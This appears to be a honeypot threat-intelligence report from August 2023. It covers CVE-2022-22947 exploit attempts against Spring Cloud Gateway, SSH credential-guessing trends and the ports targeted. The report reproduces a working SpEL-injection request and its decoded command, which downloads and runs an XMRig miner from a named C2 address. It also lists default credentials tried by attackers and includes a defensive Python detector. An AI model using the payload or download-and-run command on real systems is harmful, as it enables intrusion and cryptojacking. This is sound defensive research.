TEHTRIS believes in building cyber threat intelligence on empirical observations of what is happening in the cyber world. To do so, we deployed a large network of honeypots equipped with TEHTRIS solutions, and our team analyses the logs collected in the XDR Platform.
Keeping track of trends, and keeping an eye on what threat actors actively scan during their reconnaissance phase, allows us to adjust our cybersecurity posture and to detect weak signals of further malicious activity.
Check out our previous report here.
CVE-2022-22947 EXPLOIT ATTEMPTS
We have observed CVE-2022-22947 (CVSSv3: 10) exploit attempts on our honeypots network. This CVE affects Spring Cloud Gateway applications, which are vulnerable to code injection when the Gateway Actuator endpoint is enabled, exposed and unsecured.
On the 26th and the 27th of August, the US IP address 185.207.250[.]115, hosted by AS51167 (Contabo GmbH) and known in public databases as malicious, targeted our honeypots on port TCP/80. The devices affected are European honeypots hosted in the following countries: Spain, France, Estonia, Netherlands, Czech Republic, Finland, Portugal, Belgium, Ireland, Italy, and Poland.
Here is an example of the corresponding request captured by our honeypot (request line, User-Agent header, then the JSON body defining the malicious route):
POST /actuator/gateway/routes/AzMtdFlkrml HTTP/1.1
User-Agent: Custom-HttpClient

{ "id": "AzMtdFlkrml", "filters": [{ "name": "AddResponseHeader", "args": { "name": "Result", "value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String(java.util.Base64.getDecoder().decode(\"cGtpbGwgLTkgLmZveG07IGNkIC90bXA7IHdnZXQgaHR0cDovLzE4NS4yMjUuNzUuMjQyL2Rvd25sb2FkL3htcmlnLng4Nl82NDsgY3VybCAtTyBodHRwOi8vMTg1LjIyNS43NS4yNDIvZG93bmxvYWQveG1yaWcueDg2XzY0OyBtdiB4bXJpZy54ODZfNjQgLmZveG07IGNobW9kICt4IC5mb3htOyAuLy5mb3ht\"))).getInputStream()))}" } }], "uri": "http://example.com" }
This request exploits CVE-2022-22947: the SpEL expression in the filter argument is evaluated by the gateway, which executes a base64-encoded command on the victim.
The decoded command downloads an XMRig cryptocurrency miner and executes it:
pkill -9 .foxm; cd /tmp; wget http[:]//185.225.75[.]242/download/xmrig.x86_64; curl -O http[:]//185.225.75[.]242/download/xmrig.x86_64; mv xmrig.x86_64 .foxm; chmod +x .foxm; ./.foxm
This Dutch command-and-control (C2) IP address 185.225.75[.]242 is hosted by AS211252 (Delis LLC) and is known to the VirusTotal community, where it is reported for SSH credential attacks and linked to a miner.
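As an added example (not part of the TEHTRIS report or its tooling), a small Python triage helper that flags the pattern above in HTTP request logs: a POST to the gateway actuator routes endpoint whose filter argument carries a SpEL expression, with the base64 argument decoded for the analyst. The sample body is constructed here with a placeholder command and host, not the captured payload.

```python
import base64
import json
import re

# Constructed sample, not the request captured by the honeypot: same structure
# as the CVE-2022-22947 payload, but the embedded command is a harmless placeholder.
SAMPLE_CMD = "cd /tmp; wget http://PLACEHOLDER_HOST/payload; chmod +x payload"
SAMPLE_BODY = json.dumps({
    "id": "sample-route",
    "filters": [{"name": "AddResponseHeader", "args": {
        "name": "Result",
        "value": '#{new String(T(org.springframework.util.StreamUtils).copyToByteArray('
                 'T(java.lang.Runtime).getRuntime().exec(new String(java.util.Base64'
                 '.getDecoder().decode("%s"))).getInputStream()))}'
                 % base64.b64encode(SAMPLE_CMD.encode()).decode()}}],
    "uri": "http://example.com",
})

ROUTE_WRITE = re.compile(r"^/actuator/gateway/routes/[^/?\s]+$")  # route create/update path
B64_ARG = re.compile(r'decode\("([A-Za-z0-9+/=]+)"\)')  # base64 literal handed to decode()


def inspect_route_request(method: str, path: str, body: str) -> dict:
    """Flag Spring Cloud Gateway actuator route writes whose filter arguments
    carry a SpEL expression, and decode any base64 literal found inside it."""
    result = {"route_write": False, "suspicious": False, "reasons": [], "decoded_command": None}
    if method.upper() == "POST" and ROUTE_WRITE.match(path):
        result["route_write"] = True  # writing routes from outside is itself worth alerting on
    try:
        route = json.loads(body) if body else {}
    except ValueError:
        return result
    filters = route.get("filters", []) if isinstance(route, dict) else []
    for filt in filters:
        for value in (filt.get("args") or {}).values():
            if not isinstance(value, str) or "#{" not in value:
                continue
            result["suspicious"] = True
            result["reasons"].append("SpEL expression in filter arg of '%s'" % filt.get("name"))
            if "T(java.lang.Runtime)" in value or ".exec(" in value:
                result["reasons"].append("Runtime.exec inside SpEL expression")
            m = B64_ARG.search(value)
            if m:
                try:
                    result["decoded_command"] = base64.b64decode(m.group(1)).decode("utf-8", "replace")
                except ValueError:
                    result["reasons"].append("undecodable base64 argument")
    return result


if __name__ == "__main__":
    print(json.dumps(inspect_route_request("POST", "/actuator/gateway/routes/sample-route", SAMPLE_BODY), indent=2))
```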
IoCs
- 185.207.250[.]115
- 185.225.75[.]242
SSH services targeted – August trends
For the month of August 2023, we have observed the following trends regarding malicious activities targeting SSH services on our worldwide honeypots network.
Top 10 credentials tested by threat actors:
| Login | Password |
| --- | --- |
| 345gs5662d34 | 345gs5662d34 |
| admin | admin |
| 0 | 0 |
| ubnt | ubnt |
| root | password |
| root | root |
| admin | admin123 |
| factory | factory |
| 3comcso | RIP000 |
| cameras | cameras |
Top 10 of the most malicious IP addresses (all known from public databases):
Top ports/protocols targeted by threat actors – August 2023
| Protocol | Port | Share (%) |
| --- | --- | --- |
| TCP | 445 | 18.833% |
| TCP | 22 | 12.43% |
| TCP | 80 | 6.273% |
| TCP | 23 | 5.598% |
| TCP | 6379 | 1.546% |
| TCP | 443 | 1.22% |
| UDP | 12522 | 1.166% |
| TCP | 3389 | 0.964% |
| UDP | 5060 | 0.641% |
| TCP | 8443 | 0.508% |
Top 10 most exploited CVE – August 2023